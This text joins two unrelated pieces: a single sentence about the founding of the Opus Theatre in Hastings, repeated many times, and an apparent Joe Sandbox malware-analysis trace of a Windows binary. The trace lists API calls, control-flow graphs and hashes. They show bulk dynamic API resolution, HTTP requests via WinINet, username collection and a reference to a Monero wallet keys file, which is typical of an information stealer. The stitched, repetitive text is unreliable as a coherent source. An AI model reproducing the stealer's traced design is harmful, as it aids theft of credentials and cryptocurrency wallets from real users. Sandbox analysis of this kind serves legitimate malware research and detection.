United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: d2ac8f10fa8f904057df08b032ac301375c608fb5b698332f1607f1322bef9df
                                  • Instruction ID: 519b710b85141431d3be9267fa12005c55e15cc2ad83e8bfbfa1b9eb2557df13
                                  • Opcode Fuzzy Hash: d2ac8f10fa8f904057df08b032ac301375c608fb5b698332f1607f1322bef9df
                                  • Instruction Fuzzy Hash: 064167A16D26246EF734BBA48C56F9E7676DF8370AF405062AD4012680CEB47537C719

                                  Control-flow Graph (legend: Executed / Not Executed)
                                  control_flow_graph 801 234880-234942 call 24a7a0 call 2347b0 call 24a740 * 5 InternetOpenA StrCmpCA 816 234944 801->816 817 23494b-23494f 801->817 816->817 818 234955-234acd call 248b60 call 24a920 call 24a8a0 call 24a800 * 2 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a920 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a920 call 24a8a0 call 24a800 * 2 InternetConnectA 817->818 819 234ecb-234ef3 InternetCloseHandle call 24aad0 call 239ac0 817->819 818->819 905 234ad3-234ad7 818->905 829 234f32-234fa2 call 248990 * 2 call 24a7a0 call 24a800 * 8 819->829 830 234ef5-234f2d call 24a820 call 24a9b0 call 24a8a0 call 24a800 819->830 830->829 906 234ae5 905->906 907 234ad9-234ae3 905->907 908 234aef-234b22 HttpOpenRequestA 906->908 907->908 909 234b28-234e28 call 24a9b0 call 24a8a0 call 24a800 call 24a920 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a920 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a920 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a920 call 24a8a0 call 24a800 call 24a740 call 24a920 * 2 call 24a8a0 call 24a800 * 2 call 24aad0 lstrlen call 24aad0 * 2 lstrlen call 24aad0 HttpSendRequestA 908->909 910 234ebe-234ec5 InternetCloseHandle 908->910 1021 234e32-234e5c InternetReadFile 909->1021 910->819 1022 234e67-234eb9 InternetCloseHandle call 24a800 1021->1022 1023 234e5e-234e65 1021->1023 1022->910 1023->1022 1024 234e69-234ea7 call 24a9b0 call 24a8a0 call 24a800 1023->1024 1024->1021
                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00234839
                                    • Part of subcall function 002347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00234849
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00234915
                                  • StrCmpCA.SHLWAPI(?,0104FCA0), ref: 0023493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00234ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00250DDB,00000000,?,?,00000000,?,",00000000,?,0104FC10), ref: 00234DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00234E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00234E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00234E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00234EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00234EC5
                                  • HttpOpenRequestA.WININET(00000000,0104FD20,?,0104F3F8,00000000,00000000,00400100,00000000), ref: 00234B15
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00234ECF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: 0aefaabbd044bccd8638b56703b1a74a9be6557f6bb5425540334f6500ab561f
                                  • Instruction ID: 2278862abb28be648497ca1501796a23269f0f56141f6308657676bda5d959f1
                                  • Opcode Fuzzy Hash: 0aefaabbd044bccd8638b56703b1a74a9be6557f6bb5425540334f6500ab561f
                                  • Instruction Fuzzy Hash: 7012FF72961118AAEB19EB90DC92FEEB378FF55300F5041A9B10672091EF702F59CF66
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002311B7), ref: 00247880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00247887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0024789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 60b947e30fc9cbfb2d5c8afaba98abd09087f82031a6798f951f9221abeac3c9
                                  • Instruction ID: 4b3019a4c5c9b417237f046bd3f46ec2c6977c05c13e8f0fd28d00dba9b4e064
                                  • Opcode Fuzzy Hash: 60b947e30fc9cbfb2d5c8afaba98abd09087f82031a6798f951f9221abeac3c9
                                  • Instruction Fuzzy Hash: 48F04FB1944208AFC714DF98DD4ABAEBBB8EB45711F10026AFA15A2680C77455548BA2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 90ba5cdd12f6f3aee84a47a341393359b2db229b0d14cd9d97b69bf917607d75
                                  • Instruction ID: a08c266526780e9ebfb68f5d3021b300a7ead1c3e393d653f2574342d9f72b24
                                  • Opcode Fuzzy Hash: 90ba5cdd12f6f3aee84a47a341393359b2db229b0d14cd9d97b69bf917607d75
                                  • Instruction Fuzzy Hash: 20D09E7490430CDBCB04DFE0D9496DDBB7CFB48716F101565D90962340EA3195E6CAAA

                                  Control-flow Graph (legend: Executed / Not Executed)
                                  control_flow_graph 633 249c10-249c1a 634 24a036-24a0ca LoadLibraryA * 8 633->634 635 249c20-24a031 GetProcAddress * 43 633->635 636 24a146-24a14d 634->636 637 24a0cc-24a141 GetProcAddress * 5 634->637 635->634 638 24a216-24a21d 636->638 639 24a153-24a211 GetProcAddress * 8 636->639 637->636 640 24a21f-24a293 GetProcAddress * 5 638->640 641 24a298-24a29f 638->641 639->638 640->641 642 24a2a5-24a332 GetProcAddress * 6 641->642 643 24a337-24a33e 641->643 642->643 644 24a344-24a41a GetProcAddress * 9 643->644 645 24a41f-24a426 643->645 644->645 646 24a4a2-24a4a9 645->646 647 24a428-24a49d GetProcAddress * 5 645->647 648 24a4dc-24a4e3 646->648 649 24a4ab-24a4d7 GetProcAddress * 2 646->649 647->646 650 24a515-24a51c 648->650 651 24a4e5-24a510 GetProcAddress * 2 648->651 649->648 652 24a612-24a619 650->652 653 24a522-24a60d GetProcAddress * 10 650->653 651->650 654 24a67d-24a684 652->654 655 24a61b-24a678 GetProcAddress * 4 652->655 653->652 656 24a686-24a699 GetProcAddress 654->656 657 24a69e-24a6a5 654->657 655->654 656->657 658 24a6a7-24a703 GetProcAddress * 4 657->658 659 24a708-24a709 657->659 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(76210000,010352C8), ref: 00249C2D
                                  • GetProcAddress.KERNEL32(76210000,01035328), ref: 00249C45
                                  • GetProcAddress.KERNEL32(76210000,01049040), ref: 00249C5E
                                  • GetProcAddress.KERNEL32(76210000,01048FE0), ref: 00249C76
                                  • GetProcAddress.KERNEL32(76210000,01049028), ref: 00249C8E
                                  • GetProcAddress.KERNEL32(76210000,0104DD48), ref: 00249CA7
                                  • GetProcAddress.KERNEL32(76210000,0103A928), ref: 00249CBF
                                  • GetProcAddress.KERNEL32(76210000,0104DD78), ref: 00249CD7
                                  • GetProcAddress.KERNEL32(76210000,0104DD60), ref: 00249CF0
                                  • GetProcAddress.KERNEL32(76210000,0104DB68), ref: 00249D08
                                  • GetProcAddress.KERNEL32(76210000,0104DCE8), ref: 00249D20
                                  • GetProcAddress.KERNEL32(76210000,01035308), ref: 00249D39
                                  • GetProcAddress.KERNEL32(76210000,010350A8), ref: 00249D51
                                  • GetProcAddress.KERNEL32(76210000,01034F48), ref: 00249D69
                                  • GetProcAddress.KERNEL32(76210000,01035188), ref: 00249D82
                                  • GetProcAddress.KERNEL32(76210000,0104DCD0), ref: 00249D9A
                                  • GetProcAddress.KERNEL32(76210000,0104DAD8), ref: 00249DB2
                                  • GetProcAddress.KERNEL32(76210000,0103A810), ref: 00249DCB
                                  • GetProcAddress.KERNEL32(76210000,01034F68), ref: 00249DE3
                                  • GetProcAddress.KERNEL32(76210000,0104DC58), ref: 00249DFB
                                  • GetProcAddress.KERNEL32(76210000,0104DB38), ref: 00249E14
                                  • GetProcAddress.KERNEL32(76210000,0104DB80), ref: 00249E2C
                                  • GetProcAddress.KERNEL32(76210000,0104DB08), ref: 00249E44
                                  • GetProcAddress.KERNEL32(76210000,010350E8), ref: 00249E5D
                                  • GetProcAddress.KERNEL32(76210000,0104DBE0), ref: 00249E75
                                  • GetProcAddress.KERNEL32(76210000,0104DD90), ref: 00249E8D
                                  • GetProcAddress.KERNEL32(76210000,0104DAF0), ref: 00249EA6
                                  • GetProcAddress.KERNEL32(76210000,0104DCB8), ref: 00249EBE
                                  • GetProcAddress.KERNEL32(76210000,0104DBF8), ref: 00249ED6
                                  • GetProcAddress.KERNEL32(76210000,0104DDA8), ref: 00249EEF
                                  • GetProcAddress.KERNEL32(76210000,0104DC70), ref: 00249F07
                                  • GetProcAddress.KERNEL32(76210000,0104DB98), ref: 00249F1F
                                  • GetProcAddress.KERNEL32(76210000,0104DB50), ref: 00249F38
                                  • GetProcAddress.KERNEL32(76210000,0103FD18), ref: 00249F50
                                  • GetProcAddress.KERNEL32(76210000,0104DC10), ref: 00249F68
                                  • GetProcAddress.KERNEL32(76210000,0104DD30), ref: 00249F81
                                  • GetProcAddress.KERNEL32(76210000,01034F88), ref: 00249F99
                                  • GetProcAddress.KERNEL32(76210000,0104DBB0), ref: 00249FB1
                                  • GetProcAddress.KERNEL32(76210000,010351A8), ref: 00249FCA
                                  • GetProcAddress.KERNEL32(76210000,0104DC28), ref: 00249FE2
                                  • GetProcAddress.KERNEL32(76210000,0104DAC0), ref: 00249FFA
                                  • GetProcAddress.KERNEL32(76210000,01035108), ref: 0024A013
                                  • GetProcAddress.KERNEL32(76210000,01035028), ref: 0024A02B
                                  • LoadLibraryA.KERNEL32(0104DC40,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A03D
                                  • LoadLibraryA.KERNEL32(0104DBC8,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A04E
                                  • LoadLibraryA.KERNEL32(0104DC88,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A060
                                  • LoadLibraryA.KERNEL32(0104DCA0,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A072
                                  • LoadLibraryA.KERNEL32(0104DD00,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A083
                                  • LoadLibraryA.KERNEL32(0104DD18,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A095
                                  • LoadLibraryA.KERNEL32(0104DB20,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A0A7
                                  • LoadLibraryA.KERNEL32(0104DE08,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A0B8
                                  • GetProcAddress.KERNEL32(751E0000,01035148), ref: 0024A0DA
                                  • GetProcAddress.KERNEL32(751E0000,0104DE50), ref: 0024A0F2
                                  • GetProcAddress.KERNEL32(751E0000,01048958), ref: 0024A10A
                                  • GetProcAddress.KERNEL32(751E0000,0104DEF8), ref: 0024A123
                                  • GetProcAddress.KERNEL32(751E0000,010351C8), ref: 0024A13B
                                  • GetProcAddress.KERNEL32(701C0000,0103A860), ref: 0024A160
                                  • GetProcAddress.KERNEL32(701C0000,010355A8), ref: 0024A179
                                  • GetProcAddress.KERNEL32(701C0000,0103A568), ref: 0024A191
                                  • GetProcAddress.KERNEL32(701C0000,0104DE68), ref: 0024A1A9
                                  • GetProcAddress.KERNEL32(701C0000,0104DDF0), ref: 0024A1C2
                                  • GetProcAddress.KERNEL32(701C0000,01035568), ref: 0024A1DA
                                  • GetProcAddress.KERNEL32(701C0000,01035408), ref: 0024A1F2
                                  • GetProcAddress.KERNEL32(701C0000,0104DE98), ref: 0024A20B
                                  • GetProcAddress.KERNEL32(753A0000,01035508), ref: 0024A22C
                                  • GetProcAddress.KERNEL32(753A0000,01035588), ref: 0024A244
                                  • GetProcAddress.KERNEL32(753A0000,0104DEE0), ref: 0024A25D
                                  • GetProcAddress.KERNEL32(753A0000,0104DF40), ref: 0024A275
                                  • GetProcAddress.KERNEL32(753A0000,010356A8), ref: 0024A28D
                                  • GetProcAddress.KERNEL32(76310000,0103A590), ref: 0024A2B3
                                  • GetProcAddress.KERNEL32(76310000,0103A8B0), ref: 0024A2CB
                                  • GetProcAddress.KERNEL32(76310000,0104DF70), ref: 0024A2E3
                                  • GetProcAddress.KERNEL32(76310000,01035348), ref: 0024A2FC
                                  • GetProcAddress.KERNEL32(76310000,01035468), ref: 0024A314
                                  • GetProcAddress.KERNEL32(76310000,0103A8D8), ref: 0024A32C
                                  • GetProcAddress.KERNEL32(76910000,0104DF10), ref: 0024A352
                                  • GetProcAddress.KERNEL32(76910000,01035448), ref: 0024A36A
                                  • GetProcAddress.KERNEL32(76910000,01048978), ref: 0024A382
                                  • GetProcAddress.KERNEL32(76910000,0104DF28), ref: 0024A39B
                                  • GetProcAddress.KERNEL32(76910000,0104DF58), ref: 0024A3B3
                                  • GetProcAddress.KERNEL32(76910000,010356C8), ref: 0024A3CB
                                  • GetProcAddress.KERNEL32(76910000,010353C8), ref: 0024A3E4
                                  • GetProcAddress.KERNEL32(76910000,0104DE20), ref: 0024A3FC
                                  • GetProcAddress.KERNEL32(76910000,0104DDC0), ref: 0024A414
                                  • GetProcAddress.KERNEL32(75B30000,01035428), ref: 0024A436
                                  • GetProcAddress.KERNEL32(75B30000,0104DE38), ref: 0024A44E
                                  • GetProcAddress.KERNEL32(75B30000,0104DDD8), ref: 0024A466
                                  • GetProcAddress.KERNEL32(75B30000,0104DE80), ref: 0024A47F
                                  • GetProcAddress.KERNEL32(75B30000,0104DEB0), ref: 0024A497
                                  • GetProcAddress.KERNEL32(75670000,01035488), ref: 0024A4B8
                                  • GetProcAddress.KERNEL32(75670000,01035688), ref: 0024A4D1
                                  • GetProcAddress.KERNEL32(76AC0000,01035648), ref: 0024A4F2
                                  • GetProcAddress.KERNEL32(76AC0000,0104DEC8), ref: 0024A50A
                                  • GetProcAddress.KERNEL32(6F4E0000,01035608), ref: 0024A530
                                  • GetProcAddress.KERNEL32(6F4E0000,010355C8), ref: 0024A548
                                  • GetProcAddress.KERNEL32(6F4E0000,010354A8), ref: 0024A560
                                  • GetProcAddress.KERNEL32(6F4E0000,0104D928), ref: 0024A579
                                  • GetProcAddress.KERNEL32(6F4E0000,01035548), ref: 0024A591
                                  • GetProcAddress.KERNEL32(6F4E0000,010354C8), ref: 0024A5A9
                                  • GetProcAddress.KERNEL32(6F4E0000,010354E8), ref: 0024A5C2
                                  • GetProcAddress.KERNEL32(6F4E0000,01035528), ref: 0024A5DA
                                  • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0024A5F1
                                  • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0024A607
                                  • GetProcAddress.KERNEL32(75AE0000,0104D8B0), ref: 0024A629
                                  • GetProcAddress.KERNEL32(75AE0000,01048988), ref: 0024A641
                                  • GetProcAddress.KERNEL32(75AE0000,0104DAA8), ref: 0024A659
                                  • GetProcAddress.KERNEL32(75AE0000,0104D940), ref: 0024A672
                                  • GetProcAddress.KERNEL32(76300000,010356E8), ref: 0024A693
                                  • GetProcAddress.KERNEL32(6D4F0000,0104D910), ref: 0024A6B4
                                  • GetProcAddress.KERNEL32(6D4F0000,010355E8), ref: 0024A6CD
                                  • GetProcAddress.KERNEL32(6D4F0000,0104DA00), ref: 0024A6E5
                                  • GetProcAddress.KERNEL32(6D4F0000,0104D9A0), ref: 0024A6FD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                   • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: b92877963656a93befa0d1255acd536a854a73bdbd58160e456c87d7c0089be4
                                  • Instruction ID: cafc2c7d961f2a30b3116272463d87057849e2223073f66a015782b3354ea92b
                                  • Opcode Fuzzy Hash: b92877963656a93befa0d1255acd536a854a73bdbd58160e456c87d7c0089be4
                                  • Instruction Fuzzy Hash: 84624AB5504200AFC348EFB8ED8996E77F9F7CC201715853AA60DC3264D63998E5CB6B

                                   Control-flow Graph (entry block 236280; rendered graph omitted, not recoverable as text)
                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00234839
                                    • Part of subcall function 002347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00234849
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • InternetOpenA.WININET(00250DFE,00000001,00000000,00000000,00000000), ref: 002362E1
                                  • StrCmpCA.SHLWAPI(?,0104FCA0), ref: 00236303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00236335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0104F3F8,00000000,00000000,00400100,00000000), ref: 00236385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002363BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002363D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 002363FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0023646D
                                  • InternetCloseHandle.WININET(00000000), ref: 002364EF
                                  • InternetCloseHandle.WININET(00000000), ref: 002364F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00236503
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 3f43cc89e6edad02da8f3386daba66bc1ed864c363f8638440867bdaa79e6f94
                                  • Instruction ID: 2007cbc18832e6297e23d95110db65ee0748df292957f8a0e21739c8ccc8849e
                                  • Opcode Fuzzy Hash: 3f43cc89e6edad02da8f3386daba66bc1ed864c363f8638440867bdaa79e6f94
                                  • Instruction Fuzzy Hash: 327153B1A60218ABEB24DF90CC49FEEB778FB44700F108198F5096B190DBB46A95CF51

                                   Control-flow Graph (entry block 245510; rendered graph omitted, not recoverable as text)
                                  APIs
                                    • Part of subcall function 0024A820: lstrlen.KERNEL32(00234F05,?,?,00234F05,00250DDE), ref: 0024A82B
                                    • Part of subcall function 0024A820: lstrcpy.KERNEL32(00250DDE,00000000), ref: 0024A885
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00245644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002456A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00245857
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00245228
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 002452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00245318
                                    • Part of subcall function 002452C0: lstrlen.KERNEL32(00000000), ref: 0024532F
                                    • Part of subcall function 002452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00245364
                                    • Part of subcall function 002452C0: lstrlen.KERNEL32(00000000), ref: 00245383
                                    • Part of subcall function 002452C0: lstrlen.KERNEL32(00000000), ref: 002453AE
